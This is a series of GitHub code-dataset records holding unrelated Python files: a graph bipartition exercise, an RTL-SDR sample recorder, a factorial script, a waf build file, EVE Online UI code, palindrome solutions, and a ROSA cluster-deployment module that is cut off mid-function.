outpath_plots+'drifters_pdf_all.png'\nplot_pdf(sl_all,slo_all,outname)\n\n\n\n","repo_name":"nansencenter/nextsim-age","sub_path":"age_drifters.py","file_name":"age_drifters.py","file_ext":"py","file_size_in_byte":11298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31612300245","text":"#\n# Write a function, `bipartite` that\n# takes as input a graph, `G` and tries\n# to divide G into two sets where\n# there are no edges between elements of the\n# the same set - only between elements in\n# different sets.\n# If two sets exists, return one of them\n# or `None` otherwise\n# Assume G is connected\n#\n\nimport timeit\n\n\n# Given this function\ndef make_link(G, node1, node2):\n if node1 not in G:\n G[node1] = {}\n (G[node1])[node2] = 1\n if node2 not in G:\n G[node2] = {}\n (G[node2])[node1] = 1\n return G\n\n\ndef bipartite(G):\n # TODO: Essentially a breadth first search of the graph...without using a queue\n # Start at arbitrary node in graph. Append it to set1 and mark it as so, using a dict. Check edges for unmarked\n # nodes. Any found must be in the opposite set for it to be valid. Now we must do the same for the group of nodes we\n # placed in set 2. Check edges for nodes, following same procedure for unmarked nodes. For marked neighbours, if\n # they are in same set as the node, that means the graph is invalid, as it was placed there to move it away from\n # another node in opposite set and cannot move it there. Mark ths graph as invalid, but continue on to produce a\n # graph anyway (could be trimmed of bad edges if we mark them as bad to get valid graph).\n # This procedure starts after intialising a start node, then continues checking each new group of nodes, alternating\n # between sets till all nodes have been placed in either set. If it is possible to create a bipartite graph,\n # this algorithm will create a valid form, else it will mark the attempt as invalid. This is because we have checked\n # every edge in the graph (twice) to make sure the nodes are in opposite sets, and done so in a sequential manner,\n # meaning each nodes placement relies on the chain of nodes before it.\n\n # Initialise start node as first node in dict keys list (doesnt matter where we start)\n reference_node = list(G)[0]\n sets = [[reference_node], []]\n set_index = 1\n slice_index = [0, 0]\n # Add marker for each node in the graph so we know which set it has been put it, if any. 0=set1, 1=set2\n markers = {reference_node: 0}\n invalid_graph = False\n break_loop = False\n # Loop till we have placed all nodes into either set\n while True:\n # All nodes placed into a set, just have to check edges of the last group of nodes before we break loop,\n # in case they are connected to other nodes in same set. If we placed at end of loop, would terminate\n # early, as we mark before checking edges, leading to potentially returning an invalid graph.\n if len(markers) == len(G):\n break_loop = True\n # alternate between set1 and set2: 1-0 = 1, 1-1 = 0\n set_index = 1 - set_index\n current_set = sets[set_index]\n other_set = sets[1 - set_index]\n # Check edges of each node in the current, and then place the connected nodes in the other set.\n for node in current_set[slice_index[set_index]:]: # only search new nodes added to set\n # increment slice index for next loop for each new node found\n slice_index[set_index] += 1\n for neighbour in G[node]:\n # If neighbour is marked, check if its in same group, if so, we cannot create a bipartite graph.\n if neighbour in markers:\n if markers[neighbour] != 1 - set_index:\n # print(\"edge between nodes:\", node, \",\", neighbour, \"in set\",\n # set_index + 1, \"- graph cannot be transformed into bipartite form\")\n invalid_graph = True\n else: # New node found, add to other set, marking it\n markers[neighbour] = 1 - set_index\n other_set.append(neighbour)\n\n # All nodes are placed into either set and edges have been checked, graph is transformed into valid bipartite\n # graph, or marked as invalid. Must now break while loop.\n if break_loop:\n break\n\n if invalid_graph:\n return None\n else:\n # print(sets)\n return set(sets[0])\n\n\ndef test_bipartite():\n edges = [(1, 2), (2, 3), (1, 4), (2, 5),\n (3, 8), (5, 6)]\n bi_edges = [(1, 5), (2, 5), (2, 6), (7, 2), (3, 7), (3, 5), (7, 4)]\n bad_edges = [(7, 2), (2, 5), (1, 5), (3, 4), (2, 6), (7, 4), (3, 7), (3, 5)]\n G = {}\n for n1, n2 in edges:\n make_link(G, n1, n2)\n g1 = bipartite(G)\n assert (g1 == set([1, 3, 5]) or\n g1 == set([2, 4, 6, 8]))\n edges = [(1, 2), (1, 3), (2, 3)]\n G = {}\n for n1, n2 in edges:\n make_link(G, n1, n2)\n g1 = bipartite(G)\n assert g1 == None\n\n\nsetup2 = \"from __main__ import bipartite\\nfrom __main__ import make_link\"\ncode2 = \"bi_edges = [(1, 5), (2, 5), (2, 6), (7, 2), (3, 7), (3, 5), (7, 4)]\\n\" \\\n \"bad_edges = [(7, 2), (2, 5), (1, 5), (3, 4), (2, 6), (7, 4), (3, 7), (3, 5)]\\n\" \\\n \"b1 = {}\\nfor n1, n2 in bi_edges:\\n make_link(b1, n1, n2)\\n\" \\\n \"b2 = {}\\nfor n1, n2 in bad_edges:\\n make_link(b2, n1, n2)\\n\" \\\n \"bipartite(b1); bipartite(b2)\"\ntime = timeit.timeit(setup=setup2, stmt=code2, number=10000)\nprint(time)\n","repo_name":"lamelameo/Algorithms-Udacity-Misc","sub_path":"Udacity/cs215 - Intro to Algorithms/final assessment/bipartite.py","file_name":"bipartite.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12919603226","text":"from scipy import signal\nfrom numpy import max, abs, int16\nfrom rtlsdr import RtlSdr\nfrom scipy.io import wavfile\nfrom datetime import datetime\n\nN = 4096000\nFREQ = 433.92e6\nF_OFFSET = 0.02e6\nGAIN = 15\nSAMPLE_RATE = 1e6\n\ndef initialize():\n global sdr\n fc = FREQ - F_OFFSET\n sdr = RtlSdr()\n sdr.center_freq = fc\n sdr.sample_rate = SAMPLE_RATE\n sdr.gain = GAIN\n\ndef current_time():\n time = datetime.now()\n current_time = time.strftime(\"%H:%M:%S\")\n return current_time\n\n\ndef record():\n #print(\"start\")\n \n samples = sdr.read_samples(N)\n # decimated = signal.decimate(samples, 20) #Dla wartości 20 jest jeszcze w miarę ładnie widoczny sygnał\n # scaled = int16(decimated.real / max(abs(decimated)) * 32767)\n # wavfile.write('../../remote-control-hacking/recorded_signals_urh/1_off/out2.wav', int(sdr.sample_rate), scaled.astype(\"int16\"))\n # print(\"end\")\n return samples\n\n\ndef decimate(samples):\n # Dla wartości 20 jest jeszcze w miarę ładnie widoczny sygnał\n decimated = signal.decimate(samples, 20)\n scaled = int16(decimated.real / max(abs(decimated)) * 32767)\n return scaled\n","repo_name":"kubamarchut/remote-control-hacking","sub_path":"final-system/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23159701458","text":"def factorial(number):\n if number == 0 or number==1:\n return 1\n else:\n fac =1 \n return number *factorial(number -1)\ndef factorialTraillngZeros(number):\n count=0\n fac = factorial(number)\n #print(fac)\n while (fac %10 == 0):\n count = count+1\n fac=fac /10\n return count \nif __name__ == \"__main__\":\n number = int(input(\"Enter the number :\\n\"))\n fac = factorial(number)\n print(f\"The factorial of {number} is {fac}.\")\n zero = factorialTraillngZeros(number)\n print(f\"The trailing zero present in Factorial is {zero}.\")","repo_name":"ManishKumarShah/Factorial-and-Numbers-of-Trailing-zero","sub_path":"factorialAndTrailingZeros.py","file_name":"factorialAndTrailingZeros.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21752915030","text":"#!/bin/python\n\nfrom waflib import *\nimport os\n\ntop = '.'\nout = 'build'\n\nprojname = 'boomfield'\ncoreprog_name = projname\n\ng_cflags = [\"-Wall\", \"-std=gnu11\", \"-pthread\"]\n\ndef btype_cflags(ctx):\n\treturn {\n\t\t\"DEBUG\" : g_cflags + [\"-Wextra\", \"-Og\", \"-ggdb3\", \"-march=core2\", \"-mtune=native\"],\n\t\t\"NATIVE\" : g_cflags + [\"-Ofast\", \"-march=native\", \"-mtune=native\"],\n\t\t\"RELEASE\" : g_cflags + [\"-O3\", \"-march=core2\", \"-mtune=generic\"],\n\t}.get(ctx.env.BUILD_TYPE, g_cflags)\n\ndef options(opt):\n\topt.load(\"gcc\")\n\topt.add_option('--build_type', dest='build_type', type=\"string\", default='RELEASE', action='store', help=\"DEBUG, NATIVE, RELEASE\")\n\ndef configure(ctx):\n\tctx.load(\"gcc\")\n\tbtup = ctx.options.build_type.upper()\n\tif btup in [\"DEBUG\", \"NATIVE\", \"RELEASE\"]:\n\t\tLogs.pprint(\"PINK\", \"Setting up environment for known build type: \" + btup)\n\t\tctx.env.BUILD_TYPE = btup\n\t\tctx.env.CFLAGS = btype_cflags(ctx)\n\t\tLogs.pprint(\"PINK\", \"CFLAGS: \" + ' '.join(ctx.env.CFLAGS))\n\telse:\n\t\tLogs.error(\"UNKNOWN BUILD TYPE: \" + btup)\n\ndef build(bld):\n\tfiles = bld.path.ant_glob('src/*.c')\n\tbld.install_files('${PREFIX}/include/boomfield', ['src/tracer.h'])\n\tcoreprog = bld (\n\t\tfeatures = \"c cshlib\",\n\t\ttarget = coreprog_name,\n\t\tsource = files,\n\t\tlib = [],\n\t\tuselib = []\n\t)\n\t\ndef clean(ctx):\n\tpass\n","repo_name":"cagelight/boomfield","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37019006481","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\assetsSearch.py\r\nfrom eveAssets.assetSearchUtil import IsPartOfText, IsTextMatch, ParseString\r\nimport uiprimitives\r\nimport uicontrols\r\nimport carbonui.const as uiconst\r\nimport base\r\nimport localization\r\n\r\nclass SearchBox(uicontrols.SinglelineEdit):\r\n __guid__ = 'assets.SearchBox'\r\n default_dynamicHistoryWidth = True\r\n\r\n def ApplyAttributes(self, attributes):\r\n uicontrols.SinglelineEdit.ApplyAttributes(self, attributes)\r\n self.blockSetValue = True\r\n self.TEXTRIGHTMARGIN = 1\r\n self.searchKeywords = attributes.get('keywords', [])\r\n self.CreateLayout()\r\n\r\n def SetValue(self, text, *args, **kwargs):\r\n oldText = self.GetValue()\r\n uicontrols.SinglelineEdit.SetValue(self, text, *args, **kwargs)\r\n self.caretIndex = self.GetCursorFromIndex(self.GetSmartCaretIndex(oldText, text))\r\n self.RefreshCaretPosition()\r\n\r\n def GetSmartCaretIndex(self, oldText, newText):\r\n oldText = oldText[::-1]\r\n newText = newText[::-1]\r\n for i in xrange(len(oldText)):\r\n if oldText[i] != newText[i]:\r\n return len(newText) - i\r\n\r\n return len(newText)\r\n\r\n def CreateLayout(self):\r\n self.optionIcon = uiprimitives.Sprite(parent=self.sr.maincontainer, name='options', texturePath='res:/UI/Texture/Icons/38_16_229.png', pos=(0, 0, 16, 16), align=uiconst.TORIGHT, idx=0, hint=localization.GetByLabel('UI/Inventory/AssetSearch/KeywordOptionsHint'))\r\n self.optionIcon.SetAlpha(0.8)\r\n self.optionIcon.OnClick = self.OnOptionClick\r\n\r\n def OnOptionClick(self):\r\n self.ShowHistoryMenu(self.GetStaticHints())\r\n\r\n def GetStaticHints(self):\r\n currentText = self.GetValue(registerHistory=0)\r\n currentText = currentText.rstrip()\r\n if currentText:\r\n currentText += ' '\r\n hints = []\r\n for kw in self.searchKeywords:\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/KeywordHint', keyword=kw.keyword, description=kw.optionDescription), '%s%s: ' % (currentText, kw.keyword)))\r\n\r\n return hints\r\n\r\n def GetDynamicHints(self):\r\n hints = []\r\n caretIndex = self.caretIndex[0]\r\n currentText = self.GetValue(registerHistory=0)\r\n headText, tailText = currentText[:caretIndex], currentText[caretIndex:]\r\n tailText = tailText.lstrip()\r\n trimmedText = headText.rstrip()\r\n if trimmedText.endswith(':'):\r\n strippedText, lastWord = self.SplitText(trimmedText, removeSeprator=True)\r\n if lastWord:\r\n for kw in self.IterMatchingKeywords(lastWord):\r\n if kw.specialOptions:\r\n for option in kw.specialOptions:\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/OptionHint', keyword=kw.keyword, option=option), '%s%s: %s %s' % (strippedText,\r\n kw.keyword,\r\n option,\r\n tailText)))\r\n\r\n else:\r\n strippedText, lastWord = self.SplitText(trimmedText, removeSeprator=False)\r\n freeText, matches = ParseString(trimmedText)\r\n if lastWord:\r\n if matches and IsTextMatch(lastWord, matches[-1][1]):\r\n keyword, value = matches[-1]\r\n for kw in self.IterMatchingKeywords(keyword):\r\n if kw.specialOptions:\r\n for option in kw.specialOptions:\r\n if IsPartOfText(option, value):\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/OptionHint', keyword=kw.keyword, option=option), '%s%s %s' % (strippedText, option, tailText)))\r\n\r\n break\r\n\r\n else:\r\n for kw in self.IterMatchingKeywords(lastWord):\r\n hints.append((localization.GetByLabel('UI/Inventory/AssetSearch/KeywordHint', keyword=kw.keyword, description=kw.optionDescription), '%s%s: %s' % (strippedText, kw.keyword, tailText)))\r\n\r\n return hints\r\n\r\n def IterMatchingKeywords(self, keyword):\r\n for kw in self.searchKeywords:\r\n if IsPartOfText(kw.keyword, keyword):\r\n yield kw\r\n\r\n def SplitText(self, baseText, removeSeprator = False):\r\n strippedText, lastWord = (None, None)\r\n parts = baseText.split()\r\n if parts:\r\n lastWord = parts[-1]\r\n strippedText = baseText[:-len(lastWord)]\r\n if removeSeprator:\r\n lastWord = lastWord[:-1]\r\n if strippedText:\r\n strippedText = strippedText.rstrip() + ' '\r\n return (strippedText, '' if lastWord is None else lastWord.lower())\r\n\r\n def TryRefreshHistory(self, currentString):\r\n self.refreshHistoryTimer = base.AutoTimer(200, self.TryRefreshHistory_Thread, currentString)\r\n\r\n def TryRefreshHistory_Thread(self, currentString):\r\n if currentString.rstrip().endswith(':'):\r\n self.CheckHistory()\r\n self.refreshHistoryTimer = None\r\n\r\n def OnHistoryClick(self, clickedString):\r\n self.TryRefreshHistory(clickedString)\r\n\r\n def OnComboChange(self, combo, label, value, *args):\r\n self.SetValue(label, updateIndex=0)\r\n self.TryRefreshHistory(value)\r\n\r\n def GetValid(self):\r\n valid = uicontrols.SinglelineEdit.GetValid(self)\r\n history = [ (text, text) for text in valid ]\r\n hints = self.GetDynamicHints()\r\n return hints + history\r\n\r\n def Confirm(self, *args):\r\n active = getattr(self, 'active', None)\r\n if active:\r\n text = active.string\r\n self.SetValue(text)\r\n uicontrols.SinglelineEdit.Confirm(self, *args)\r\n if active:\r\n self.TryRefreshHistory(text)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/assetsSearch.py","file_name":"assetsSearch.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11443643355","text":"class Solution:\n def validPalindrome(self, s: str) -> bool:\n temp = list(s)\n # print(temp, temp[::-1])\n if temp == temp[::-1]: \n print(\"t\")\n return True\n \n f = 0\n b = len(s)-1\n count = 0\n \n while b-f>0:\n if s[f]!=s[b]:\n if count == 1: return False\n if s[f+1]==s[b] and s[f+2]==s[b-1]:\n f+=1\n count+=1\n elif s[f]==s[b-1] and s[f+1]==s[b-2]:\n b-=1\n count+=1\n else:\n return False\n f+=1\n b-=1\n # print(s[f],s[b],count)\n return True\n \n\n# class Solution:\n# def validPalindrome(self, s: str) -> bool:\n# def check_palindrome(s, i, j):\n# while i < j:\n# if s[i] != s[j]:\n# return False\n# i += 1\n# j -= 1\n \n# return True\n\n# i = 0\n# j = len(s) - 1\n# while i < j:\n# # Found a mismatched pair - try both deletions\n# if s[i] != s[j]:\n# return check_palindrome(s, i, j - 1) or check_palindrome(s, i + 1, j)\n# i += 1\n# j -= 1\n \n# return True\n \n# class Solution(object):\n# def validPalindrome(self, s):\n# h, t = 0, len(s) - 1 # head and tail\n# while h < t:\n# if s[h] != s[t]: # delete s[h] or s[t] and validate palindrome finally\n# return s[h:t] == s[h:t][::-1] or s[h + 1:t + 1] == s[h + 1:t + 1][::-1]\n# h, t = h + 1, t - 1\n# return True\n","repo_name":"kwilliam777/CodingTestStudy","sub_path":"weekly assingment/week12/k_680_e_x.py","file_name":"k_680_e_x.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"2182123913","text":"# -*- coding: utf8 -*-\n\"\"\"\nModule for interactions with Openshift Dedciated Cluster.\n\"\"\"\n\n\nimport json\nimport logging\nimport os\nimport re\n\nfrom ocs_ci.framework import config\nfrom ocs_ci.ocs.exceptions import (\n ManagedServiceAddonDeploymentError,\n UnsupportedPlatformVersionError,\n ConfigurationError,\n)\nfrom ocs_ci.utility import openshift_dedicated as ocm\nfrom ocs_ci.utility import utils\n\nfrom ocs_ci.utility.aws import AWS as AWSUtil\nfrom ocs_ci.utility.managedservice import (\n remove_header_footer_from_key,\n generate_onboarding_token,\n get_storage_provider_endpoint,\n)\n\n\nlogger = logging.getLogger(name=__file__)\nrosa = config.AUTH.get(\"rosa\", {})\n\n\ndef login():\n \"\"\"\n Login to ROSA client\n \"\"\"\n token = ocm[\"token\"]\n cmd = f\"rosa login --token={token}\"\n logger.info(\"Logging in to ROSA cli\")\n utils.run_cmd(cmd, secrets=[token])\n logger.info(\"Successfully logged in to ROSA\")\n\n\ndef create_cluster(cluster_name, version, region):\n \"\"\"\n Create OCP cluster.\n\n Args:\n cluster_name (str): Cluster name\n version (str): cluster version\n region (str): Cluster region\n\n \"\"\"\n\n rosa_ocp_version = config.DEPLOYMENT[\"installer_version\"]\n # Validate ocp version with rosa ocp supported version\n # Select the valid version if given version is invalid\n if not validate_ocp_version(rosa_ocp_version):\n logger.warning(\n f\"Given OCP version {rosa_ocp_version} \"\n f\"is not valid ROSA OCP version. \"\n f\"Selecting latest rosa version for deployment\"\n )\n rosa_ocp_version = get_latest_rosa_version(version)\n logger.info(f\"Using OCP version {rosa_ocp_version}\")\n\n create_account_roles(version)\n compute_nodes = config.ENV_DATA[\"worker_replicas\"]\n compute_machine_type = config.ENV_DATA[\"worker_instance_type\"]\n multi_az = \"--multi-az \" if config.ENV_DATA.get(\"multi_availability_zones\") else \"\"\n cluster_type = config.ENV_DATA.get(\"cluster_type\", \"\")\n provider_name = config.ENV_DATA.get(\"provider_name\", \"\")\n rosa_mode = config.ENV_DATA.get(\"rosa_mode\", \"\")\n cmd = (\n f\"rosa create cluster --cluster-name {cluster_name} --region {region} \"\n f\"--compute-nodes {compute_nodes} --compute-machine-type \"\n f\"{compute_machine_type} --version {rosa_ocp_version} {multi_az}--sts --yes\"\n )\n if rosa_mode == \"auto\":\n cmd += \" --mode auto\"\n if cluster_type.lower() == \"consumer\" and config.ENV_DATA.get(\"provider_name\", \"\"):\n aws = AWSUtil()\n subnet_id = config.ENV_DATA.get(\"subnet_ids\") or \",\".join(\n aws.get_cluster_subnet_ids(provider_name)\n )\n cmd = f\"{cmd} --subnet-ids {subnet_id}\"\n\n utils.run_cmd(cmd, timeout=1200)\n if rosa_mode != \"auto\":\n logger.info(\n \"Waiting for ROSA cluster status changed to waiting or pending state\"\n )\n for cluster_info in utils.TimeoutSampler(\n 4500, 30, ocm.get_cluster_details, cluster_name\n ):\n status = cluster_info[\"status\"][\"state\"]\n logger.info(f\"Current installation status: {status}\")\n if status == \"waiting\" or status == \"pending\":\n logger.info(f\"Cluster is in {status} state\")\n break\n create_operator_roles(cluster_name)\n create_oidc_provider(cluster_name)\n\n logger.info(\"Waiting for installation of ROSA cluster\")\n for cluster_info in utils.TimeoutSampler(\n 4500, 30, ocm.get_cluster_details, cluster_name\n ):\n status = cluster_info[\"status\"][\"state\"]\n logger.info(f\"Current installation status: {status}\")\n if status == \"ready\":\n logger.info(\"Cluster was installed\")\n break\n cluster_info = ocm.get_cluster_details(cluster_name)\n # Create metadata file to store the cluster name\n cluster_info[\"clusterName\"] = cluster_name\n cluster_info[\"clusterID\"] = cluster_info[\"id\"]\n cluster_path = config.ENV_DATA[\"cluster_path\"]\n metadata_file = os.path.join(cluster_path, \"metadata.json\")\n with open(metadata_file, \"w+\") as f:\n json.dump(cluster_info, f)\n\n\ndef appliance_mode_cluster(cluster_name, ocp_version, region):\n \"\"\"\n Create appliance mode provider cluster\n\n Args:\n cluster_name (str): Cluster name\n ocp_version (str): cluster version\n region (str): Cluster region\n\n \"\"\"\n addon_name = config.ENV_DATA.get(\"addon_name\", \"\")\n size = config.ENV_DATA[\"size\"]\n public_key = config.AUTH.get(\"managed_service\", {}).get(\"public_key\", \"\")\n subnet_ids = config.ENV_DATA[\"subnet_ids\"]\n notification_email_0 = config.REPORTING.get(\"notification_email_0\")\n notification_email_1 = config.REPORTING.get(\"notification_email_1\")\n notification_email_2 = config.REPORTING.get(\"notification_email_2\")\n region = config.ENV_DATA.get(\"region\", \"\")\n if not public_key:\n raise ConfigurationError(\n \"Public key for Managed Service not defined.\\n\"\n \"Expected following configuration in auth.yaml file:\\n\"\n \"managed_service:\\n\"\n ' private_key: \"...\"\\n'\n ' public_key: \"...\"'\n )\n public_key_only = remove_header_footer_from_key(public_key)\n cmd = (\n f\"rosa create service --type {addon_name} --name {cluster_name} \"\n f\"--size {size} --onboarding-validation-key {public_key_only} \"\n f\"--subnet-ids {subnet_ids}\"\n )\n if notification_email_0:\n cmd = cmd + f\" --notification-email-0 {notification_email_0}\"\n if notification_email_1:\n cmd = cmd + f\" --notification-email-1 {notification_email_1}\"\n if notification_email_2:\n cmd = cmd + f\" --notification-email-2 {notification_email_2}\"\n if region:\n cmd = cmd + f\" --region {region}\"\n\n utils.run_cmd(cmd, timeout=1200)\n logger.info(\"Waiting for ROSA cluster status changed to waiting or pending state\")\n for cluster_info in utils.TimeoutSampler(\n 4500, 30, ocm.get_cluster_details, cluster_name\n ):\n status = cluster_info[\"status\"][\"state\"]\n logger.info(f\"Current installation status: {status}\")\n if status == \"waiting\" or status == \"pending\":\n logger.info(f\"Cluster is in {status} state\")\n break\n create_operator_roles(cluster_name)\n create_oidc_provider(cluster_name)\n\n logger.info(\"Waiting for installation of ROSA cluster\")\n for cluster_info in utils.TimeoutSampler(\n 4500, 30, ocm.get_cluster_details, cluster_name\n ):\n status = cluster_info[\"status\"][\"state\"]\n logger.info(f\"Cluster installation status: {status}\")\n if status == \"ready\":\n logger.info(\"Cluster is installed\")\n break\n if cluster_info[\"status\"][\"state\"] == \"ready\":\n for addon_info in utils.TimeoutSampler(\n 7200, 30, get_addon_info, cluster_name, addon_name\n ):\n logger.info(f\"Current addon installation info: \" f\"{addon_info}\")\n if \"ready\" in addon_info:\n logger.info(f\"Addon {addon_name} is installed\")\n break\n if \"failed\" in addon_info:\n raise ManagedServiceAddonDeploymentError(\n f\"Addon {addon_name} failed to be installed\"\n )\n logger.info(\"Waiting for ROSA service ready status\")\n for service_status in utils.TimeoutSampler(\n 7200, 30, get_rosa_service_details, cluster_name\n ):\n if \"ready\" in service_status:\n logger.info(f\"service {cluster_name} is ready\")\n break\n elif \"failed\" in service_status:\n logger.info(f\"service {cluster_name} is ready\")\n break\n else:\n logger.info(f\"Current service creation status: {service_status}\")\n\n\ndef get_rosa_service_details(cluster):\n \"\"\"\n Returns info about the rosa service cluster.\n\n Args:\n cluster (str): Cluster name.\n\n \"\"\"\n cmd = \"rosa list services\"\n # cmd = f\"rosa list services -o json --region {region}\"\n services_details = utils.run_cmd(cmd, timeout=1200)\n # services_details = json.loads(out)\n for service_info in services_details.splitlines():\n if cluster in service_info:\n return service_info\n # Todo : update this function when -o json get supported in rosa services command\n # TODO : need exception handling\n return json.loads(service_info)\n\n\ndef get_latest_rosa_version(version):\n \"\"\"\n Returns latest available z-stream version available for ROSA.\n\n Args:\n version (str): OCP version in format `x.y`\n\n Returns:\n str: Latest available z-stream version\n\n \"\"\"\n cmd = \"rosa list versions\"\n output = utils.run_cmd(cmd)\n logger.info(f\"Looking for z-stream version of {version}\")\n rosa_version = None\n for line in output.splitlines():\n match = re.search(f\"^{version}\\\\.(\\\\d+) \", line)\n if match:\n rosa_version = match.group(0).rstrip()\n break\n if rosa_version is None:\n logger.error(f\"Could not find any version of {version} available for ROSA\")\n logger.info(\"Try providing an older version of OCP with --ocp-version\")\n logger.info(\"Latest OCP versions available for ROSA are:\")\n for i in range(3):\n logger.info(f\"{output.splitlines()[i + 1]}\")\n raise UnsupportedPlatformVersionError\n return rosa_version\n\n\ndef validate_ocp_version(version):\n \"\"\"\n Validate the version whether given version is z-stream version available for ROSA.\n\n Args:\n version (str): OCP version string\n\n Returns:\n bool: True if given version is available in z-stream version for ROSA\n else False\n \"\"\"\n cmd = \"rosa list versions -o json\"\n out = utils.run_cmd(cmd)\n output = json.loads(out)\n available_versions = [info[\"raw_id\"] for info in output]\n if version in available_versions:\n logger.info(f\"OCP versions {version} is available for ROSA\")\n return True\n else:\n logger.info(\n f\"Given OCP versions {version} is not available for ROSA. \"\n f\"Valid OCP versions supported on ROSA are : {available_versions}\"\n )\n return False\n\n\ndef create_account_roles(version, prefix=\"ManagedOpenShift\"):\n \"\"\"\n Create the required account-wide roles and policies, including Operator policies.\n\n Args:\n version (str): cluster version\n prefix (str): role prefix\n\n \"\"\"\n cmd = f\"rosa create account-roles --mode auto\" f\" --prefix {prefix} --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef create_operator_roles(cluster):\n \"\"\"\n Create the cluster-specific Operator IAM roles. The roles created include the\n relevant prefix for the cluster name\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n cmd = f\"rosa create operator-roles --cluster {cluster}\" f\" --mode auto --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef create_oidc_provider(cluster):\n \"\"\"\n Create the OpenID Connect (OIDC) provider that the Operators will use to\n authenticate\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n cmd = f\"rosa create oidc-provider --cluster {cluster} --mode auto --yes\"\n utils.run_cmd(cmd, timeout=1200)\n\n\ndef download_rosa_cli():\n \"\"\"\n Method to download OCM cli\n\n Returns:\n str: path to the installer\n\n \"\"\"\n force_download = (\n config.RUN[\"cli_params\"].get(\"deploy\")\n and config.DEPLOYMENT[\"force_download_rosa_cli\"]\n )\n return utils.get_rosa_cli(\n config.ENV_DATA[\"rosa_cli_version\"], force_download=force_download\n )\n\n\ndef get_addon_info(cluster, addon_name):\n \"\"\"\n Get line related to addon from rosa `list addons` command.\n\n Args:\n cluster (str): cluster name\n addon_name (str): addon name\n\n Returns:\n str: line of the command for relevant addon. If not found, it returns None.\n\n \"\"\"\n cmd = f\"rosa list addons -c {cluster}\"\n output = utils.run_cmd(cmd)\n line = [line for line in output.splitlines() if re.match(f\"^{addon_name} \", line)]\n addon_info = line[0] if line else None\n return addon_info\n\n\ndef install_odf_addon(cluster):\n \"\"\"\n Install ODF Managed Service addon to cluster.\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n addon_name = config.ENV_DATA[\"addon_name\"]\n cluster_type = config.ENV_DATA.get(\"cluster_type\", \"\")\n provider_name = config.ENV_DATA.get(\"provider_name\", \"\")\n notification_email_0 = config.REPORTING.get(\"notification_email_0\")\n notification_email_1 = config.REPORTING.get(\"notification_email_1\")\n notification_email_2 = config.REPORTING.get(\"notification_email_2\")\n cmd = f\"rosa install addon --cluster={cluster} {addon_name} --yes\"\n if notification_email_0:\n cmd = cmd + f\" --notification-email-0 {notification_email_0}\"\n if notification_email_1:\n cmd = cmd + f\" --notification-email-1 {notification_email_1}\"\n if notification_email_2:\n cmd = cmd + f\" --notification-email-2 {notification_email_2}\"\n\n if cluster_type.lower() == \"provider\":\n size = config.ENV_DATA.get(\"size\", \"\")\n cmd += f\" --size {size}\"\n public_key = config.AUTH.get(\"managed_service\", {}).get(\"public_key\", \"\")\n if not public_key:\n raise ConfigurationError(\n \"Public key for Managed Service not defined.\\n\"\n \"Expected following configuration in auth.yaml file:\\n\"\n \"managed_service:\\n\"\n ' private_key: \"...\"\\n'\n ' public_key: \"...\"'\n )\n public_key_only = remove_header_footer_from_key(public_key)\n cmd += f' --onboarding-validation-key \"{public_key_only}\"'\n\n if cluster_type.lower() == \"consumer\" and provider_name:\n storage_provider_endpoint = get_storage_provider_endpoint(provider_name)\n cmd += f' --storage-provider-endpoint \"{storage_provider_endpoint}\"'\n onboarding_ticket = config.DEPLOYMENT.get(\"onboarding_ticket\", \"\")\n if not onboarding_ticket:\n onboarding_ticket = generate_onboarding_token()\n if onboarding_ticket:\n cmd += f' --onboarding-ticket \"{onboarding_ticket}\"'\n else:\n raise ValueError(\" Invalid onboarding ticket configuration\")\n\n utils.run_cmd(cmd, timeout=1200)\n for addon_info in utils.TimeoutSampler(\n 7200, 30, get_addon_info, cluster, addon_name\n ):\n logger.info(f\"Current addon installation info: {addon_info}\")\n if \"ready\" in addon_info:\n logger.info(f\"Addon {addon_name} was installed\")\n break\n if \"failed\" in addon_info:\n raise ManagedServiceAddonDeploymentError(\n f\"Addon {addon_name} failed to be installed\"\n )\n\n\ndef delete_odf_addon(cluster):\n \"\"\"\n Delete ODF Managed Service addon from cluster.\n\n Args:\n cluster (str): cluster name or cluster id\n\n \"\"\"\n addon_name = config.ENV_DATA[\"addon_name\"]\n cmd = f\"rosa uninstall addon --cluster={cluster} {addon_name} --yes\"\n utils.run_cmd(cmd)\n for addon_info in utils.TimeoutSampler(\n 4000, 30, get_addon_info, cluster, addon_name\n ):\n logger.info(f\"Current addon installation info: \" f\"{addon_info}\")\n if \"not installed\" in addon_info:\n logger.info(f\"Addon {addon_name} was uninstalled\")\n break\n if \"failed\" in addon_info:\n raise ManagedServiceAddonDeploymentError(\n f\"Addon {addon_name} failed to be uninstalled\"\n )\n\n\ndef delete_operator_roles(cluster_id):\n \"\"\"\n Delete operator roles of the given cluster\n\n Args:\n cluster_id (str): the id of the cluster\n \"\"\"\n cmd = f\"rosa delete operator-roles -c {cluster_id} --mode auto --yes\"\n utils.run_cmd(cmd, 